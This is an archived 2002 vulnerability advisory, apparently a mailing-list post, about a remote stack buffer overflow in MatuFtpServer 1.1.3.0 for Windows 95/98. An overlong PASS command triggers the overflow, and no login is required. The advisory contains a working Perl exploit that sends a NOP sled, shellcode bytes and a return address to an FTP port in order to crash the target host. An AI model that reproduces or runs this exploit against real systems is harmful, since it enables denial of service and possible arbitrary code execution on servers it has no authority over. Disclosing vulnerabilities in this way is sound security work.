MatuFtpServer Remote Buffer Overflow and Possible DoS /*--------------------------- Description ---------------------------*/ MatuFtpServer ( http://www.matusoft.com/matuftpserver/ ) is a Japanese FTP server software for Windows95/98. We found a security vulnerability in the product that allow attackers to execute arbitrary code on the server using a buffer overflow attack. By sending a long string like PASS AAAAAAAAAAAAA....AAAAAAAAAAAAAAAAAA<CR><LF> an attacker can cause a stack overflow. Note that there is no need to send "USER" command. So valid or anonymous user account is not needed to execute this attack. /*--------------------------- Vulnerable systems ---------------------------*/ MatuFtpServer 1.1.3.0(1.13) /*--------------------------- Vendor Status ---------------------------*/ Notified at 16 Apr 2002. Not fixed yet. /*--------------------------- PoC ---------------------------*/ This exploit code will shutdown target host. #!/usr/local/bin/perl #----------------------------------------------- # MatuFtpServer 1.1.3.0 exploit ( for Windows98 ) # written by Kanatoko <anvilat_private> # http://www.jumperz.net/ #----------------------------------------------- use Socket; $connect_host = "target.example.com"; $port = 21; $iaddr = inet_aton( $connect_host ) || die "Host Resolve Error.\n"; $sock_addr = pack_sockaddr_in( $port, $iaddr ); socket( SOCKET, PF_INET, SOCK_STREAM, 0 ) || die "Socket Error.\n"; connect( SOCKET, $sock_addr ) || die "Connect Error\n"; select( SOCKET ); $|=1; select( STDOUT ); #egg written by UNYUN (http://www.shadowpenguin.org/) #16bytes $egg = "\x43\x43\x43\x43\x43\x53\x53\x53"; $egg .= "\xB8\x2D\x23\xF5\xBF\x48\x50\xC3"; #0x0177F984 $buf = "\x90" x 1032; $buf .= $egg; $buf .= "\x8C\xF9\x77\x01"; $buf .= "A" x 696; print SOCKET "PASS $buf\r\n"; $hoge = <SOCKET>; print $hoge; -- #sorry for the bad english Kanatoko <anvilat_private> http://www.jumperz.net/(Japanese)
This archive was generated by hypermail 2b30 : Wed May 22 2002 - 08:43:43 PDT